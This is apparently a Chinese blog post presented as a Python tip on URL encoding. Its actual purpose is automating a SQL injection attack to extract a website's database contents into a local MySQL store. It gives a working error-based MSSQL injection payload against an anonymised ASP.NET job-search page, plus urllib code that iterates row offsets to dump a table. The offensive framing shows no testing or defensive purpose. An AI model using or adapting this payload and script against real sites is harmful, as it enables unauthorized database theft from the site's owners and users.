Python技巧_处理带参数的超长URL

今天写了个脚本 主要就是实现利用sqlInj点直接把数据获取到本地并存到Mysql数据库中

学过python的都知道可以使用urllib2中的request()方法直接打开Url，但仅限于url后没有跟复杂的参数串

今天我利用的Url是

Http://xxx.com/xxx.aspx?jobType=-1&subJobType=-1&jobdq=-1&jobTime=-1&keyWord=1' and (select top 1 cast(CONTENT as varchar(8000)) from xxx.dbo.xxx where cast(CONTENT as varchar) not in (select top 22 cast(CONTENT as varchar) from xxx.dbo.xxx))=0--

开始我也直接用以下语句测试的：

url="上面的URL"

req=urllib2.Request(url)

urllib2.urlopen(req)

可是执行后一直提示500错误，由此可以发现应该是Python在对Url进行编码的时候更改了某些特殊字符造成Url失效

我们可以用urllib2或urllib的quote()方法控制对特殊字符的URL编码,这里推荐用 urllib下的quote_plus()方法，它将空格转化成'+'而非%20通用性更好。

我们更改后的代码如下:

url = "http://xxx.com/xxx.aspx?jobType=-1&subJobType=-1&jobdq=-1&jobTime=-1&keyWord=1' and (select top 1 cast(CONTENT as varchar(8000)) from xxx.dbo.xxx where cast(CONTENT as varchar) not in (select top "+str(count)+" cast(CONTENT as varchar) from xxx.dbo.xxx))=0--" 

quoteUrl=urllib.quote_plus(url,safe=':\'/?&=()')

fd = urllib.urlopen(quoteUrl)

这样我们就可以正常的提取数据了